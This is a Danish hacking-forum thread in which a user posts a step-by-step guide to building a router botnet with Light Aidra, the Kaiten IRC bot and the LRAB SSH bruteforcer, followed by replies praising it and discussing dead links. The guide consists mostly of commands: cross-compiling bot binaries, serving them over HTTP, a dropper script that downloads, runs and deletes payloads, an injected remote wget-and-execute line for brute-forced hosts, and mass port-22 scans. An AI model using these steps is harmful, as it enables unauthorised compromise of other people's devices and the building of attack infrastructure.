Light Aidra og LRAB - Bruteforce dig til et stort botnet.
Vejledning af Sc0rp10n

Du skal have en dedikeret server som tillader scanning og hvilken som helst server som er unmetered.

Download Light Aidra her: http://0xplanet.com/archive/Botnets/Ligh...master.zip
Efter du har unzippet filen og omdøbt filen til noget kort.
Når LA er placeret et sted og omdøbt så cd hen til LA så skriv mkdir bin -
Derefter cd til bin og skriv derefter nano s.sh og tilføj cross compliers.

Cross compliers i raw link format: http://pastebin.com/raw.php?i=edrqt9RB

wget http://uclibc.org/downloads/binaries/0.9...ps.tar.bz2 && tar -xvjf cross-compiler-mips.tar.bz2 && rm -rf cross-compiler-mips.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...el.tar.bz2 && tar -xvjf cross-compiler-mipsel.tar.bz2 && rm -rf cross-compiler-mipsel.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...5l.tar.bz2 && tar -xvjf cross-compiler-armv5l.tar.bz2 && rm -rf cross-compiler-armv5l.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...pc.tar.bz2 && tar -xvjf cross-compiler-powerpc.tar.bz2  && rm -rf cross-compiler-powerpc.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...h4.tar.bz2 && tar -xvjf cross-compiler-sh4.tar.bz2 && rm -rf cross-compiler-sh4.tar.bz2

wget http://uclibc.org/downloads/binaries/0.9...32.tar.bz2 && tar -xvjf cross-compiler-x86_32.tar.bz2  && rm -cross-compiler-x86_32.tar.bz2

Efter du har gemt din redigering skal du chmod filen (s.sh).
For at chmod filen skriv: chmod 777 s.sh
Efter det er gjort skal du skrive sh s.sh og så lad den køre.

Nu skal du downloade en irc bot som er passende og for startere anbefaler jeg Kaiten.

Download Kaiten her: ftp.109.235.50.139/pub/kaiten.c
Når Kaiten er installeret skal du redigere kaiten.c til dine egne informationer efter et er gjort skal du upload din modificeret version af Kaiten med dine infos.
Nu skal du cd ind i /root/LA/bin når det er gjordt cd til alle dine compliers og complie dem.
Eksemepl:

cd cross-compiler-mipsel/bin

wget ftp://DitFtpLinkForModificeretKaiten

./mipsel-gcc -o mipsel kaiten.c

og sådan skal du bare gøre med resten af dine cross compliers.

Efter du har cross complied er der en ny fil som hedder det samme som compilied cross complier den køre du foreksempel sådan her:
/mipsel-gcc -o mipsel kaiten.c det laver en ny fil som hedder mipsel, filen er din complied kaiten du vil bruge i botex.
Når det er gjort skriv mkdir /root/Compiled og flyt alle dine compliede bots derhen. Eksempel: mv mipsel /root/Compiled

Nu skal du installere Httpd, ved brug af yum install, apt-get etc.
Når du har downloadet Httpd skriv service httpd start for at starte httpd.
Efter du har startet httpd så skal du cd ind i din compiled mappe og flyt alt over i /var/www/html/.
Eksempel: mv mips mipsel sh4 powerpc x86_64 armv5l /var/www/html/
Skriv cd /var/www/html/ for at cd til /var/www/html/ og skriv så nano gb.sh og redigere den med koden herunder:

#!/bin/sh



wget -c http://ditlink.dk/armv5l -P /var/run && chmod +x /var/run/armv5l && /var/run/armv5l

wget -c http://ditlink.dk/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips

wget -c http://ditlink.dk/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel

wget -c http://ditlink.dk/powerpc -P /var/run && chmod +x /var/run/powerpc && /var/run/powerpc

wget -c http://ditlink.dk/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4

wget -c http://ditlink.dk/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64



sleep 3;

rm -fr /var/run/gb.sh

Gem redigeringer og chmod filen gb.sh.
Eksempel: chmod 777 gb.sh

Nu skal du installere Botex
Installere disse moduler med cpan

cpan force install IO::Socket

cpan force install IO::Select 

cpan force install Parallel::ForkManager

cpan force install Net::SSH2

Efter det skriv følgende i din terminal for at rette ssh2:

yum install gcc php-devel php-pear libssh2 libssh2-devel

pecl install -f ssh2

touch /etc/php.d/ssh2.ini

echo extension=ssh2.so > /etc/php.d/ssh2.ini

cpan force install Net::SSH2

Nu skal du download LRAB
Link: https://b.1339.cf/surknso.rar

Når du har overført LRAB til din server efter at have downloaded og unzippet den på din computer så åben LRAB og åben filen "wget.pl" og gå så over til linje 26 i wget.pl og ændre linjen.

channel->exec('cd /tmp && wget http://ditlink.dk/gb.sh && sh gb.sh && rm -rf gb.sh');

Når et er gjort skal du scanne for at lave lister, sådan her lavet du et scan.

./class PORT -a RANGE -i INTERFACE -s 10

Når du har lavet en liste så skriv ./go og så vil den spørge om "Max Process" og så sæt den mellem 600 og 1000 og så bruteforcer den listen du har lavet. Når bruteforcing er færdigt så nano wget.pl og redigere linje 11

open(fh,'<','vuln.txt'); @newarray; while (<fh>){ @array = split(':',$_);

Ændre vuln.txt til din txt-fil og gemt så filen wget.pl og i din terminal skal du så bare execute wget.pl med perl
Eksempel: perl wget.pl

Jeg har lavet en masse fil for scanning af min modificeret LRAB version.

./class 22 -a 170 -i eth0 -s 10

./class 22 -a 171 -i eth0 -s 10

./class 22 -a 172 -i eth0 -s 10

./class 22 -a 173 -i eth0 -s 10

./class 22 -a 174 -i eth0 -s 10

./class 22 -a 175 -i eth0 -s 10

./class 22 -a 176 -i eth0 -s 10

./class 22 -a 177 -i eth0 -s 10

./class 22 -a 178 -i eth0 -s 10

./class 22 -a 179 -i eth0 -s 10

./class 22 -a 130 -i eth0 -s 10

./class 22 -a 131 -i eth0 -s 10

./class 22 -a 132 -i eth0 -s 10

./class 22 -a 133 -i eth0 -s 10

./class 22 -a 134 -i eth0 -s 10

./class 22 -a 135 -i eth0 -s 10

./class 22 -a 136 -i eth0 -s 10

./class 22 -a 137 -i eth0 -s 10

./class 22 -a 138 -i eth0 -s 10

./class 22 -a 139 -i eth0 -s 10

./class 22 -a 140 -i eth0 -s 10

cat bios.txt | sort | uniq > mfu.txt

screen ./update 5000

Update er bedre modificeret bruteforcer. Hvis du er nervøs for at bruge update fordi den er obfusticated så skriv screen ./go 5000

Tillykke du nu sat op light adria og LRAB op og har lært at bruteforce routere.

Jeg poster en rent faktisk kvalitets vejledning og så er der ingen feedback?

Det er da en fin guide du har bikset sammen her, kan ikke give noget feedback før jeg får testet det på en af mine maskiner, så update kommer snarest :)

(25-08-2015, 22:22)Sc0rp10n Skrev: Jeg poster en rent faktisk kvalitets vejledning og så er der ingen feedback?

Hov. Jeg fik overset denne guide. Bestemt en god vejledning til bygning af botnet. Keep up the good work. (y)

(25-08-2015, 22:22)Sc0rp10n Skrev: Jeg poster en rent faktisk kvalitets vejledning og så er der ingen feedback?

Alright, her er lidt feedback:

Lidt objektivt:
Nedenstående links lader til at være nede
http://ftp.109.235.50.139/pub/kaiten.c
https://b.1339.cf/surknso.rar

Og hvorfor ikke bare hente Lightaidra fra github? Virker måske lidt suspekt at hente det fra en anden shady side, når det er frit tilgængeligt på github?

Lidt af min personlige holdning:
Jeg tror kvaliteten af din guide ville være højere, hvis du skrev lidt mere om hvad formålet er, samt hvordan det opnås. Lige nu er guiden meget "skriv følgende kommando, skriv så denne kommando", hvor jeg tror der er mange der ville få noget ud af, hvis du forklarede HVORFOR man skal skrive de forskellige kommandoer.

(28-08-2015, 17:01)2Rabbit Skrev: Alright, her er lidt feedback:

Lidt objektivt:
Nedenstående links lader til at være nede
http://ftp.109.235.50.139/pub/kaiten.c
https://b.1339.cf/surknso.rar

Og hvorfor ikke bare hente Lightaidra fra github? Virker måske lidt suspekt at hente det fra en anden shady side, når det er frit tilgængeligt på github?

Lidt af min personlige holdning:
Jeg tror kvaliteten af din guide ville være højere, hvis du skrev lidt mere om hvad formålet er, samt hvordan det opnås. Lige nu er guiden meget "skriv følgende kommando, skriv så denne kommando", hvor jeg tror der er mange der ville få noget ud af, hvis du forklarede HVORFOR man skal skrive de forskellige kommandoer.

kaiten.c er ikke obfusticated og koden kan sagtens læses.
surknso er LRAB

(28-08-2015, 18:24)Sc0rp10n Skrev: kaiten.c er ikke obfusticated og koden kan sagtens læses.
surknso er LRAB

Det kan godt være. Men er linksne ikke nede?

Og med hensyn til obfuscation / hvad koden gør, så var det mere http://0xplanet.com/archive/Botnets/Ligh...master.zip jeg undrede mig over. Burde det ikke være det samme som https://github.com/eurialo/lightaidra? Og i så fald, hvorfor så ikke downloade fra github, som (jeg ihvertfald synes) er en del mere troværdigt end 0xplanet?

(28-08-2015, 17:01)2Rabbit Skrev: Nedenstående links lader til at være nede
http://ftp.109.235.50.139/pub/kaiten.c
https://b.1339.cf/surknso.rar

http://ftp.109.235.50.139/pub/kaiten.c kan ikke være et link

(29-08-2015, 13:51)dagGi Skrev: http://ftp.109.235.50.139/pub/kaiten.c kan ikke være et link

Det har du ret i. havde slet ikke tænkt på, at en IP ikke har subdomæner

Når man i en kommentar herinde skriver "ftp://109.235.50.139/pub/kaiten.c" uden quotes, blvier det automatisk til ftp.109.235.50.139/pub/kaiten.c

Lader dog til at "ftp://109.235.50.139/pub/kaiten.c" heller ikke virker?

Måske har det tidligere været ftp.algemeen.org. Domænet har ikke nogen DNS RRs, ud over det rDNS der findes fra IPen.
Men mon ikke Sc0rp10n kan kaste lys over sagen. :)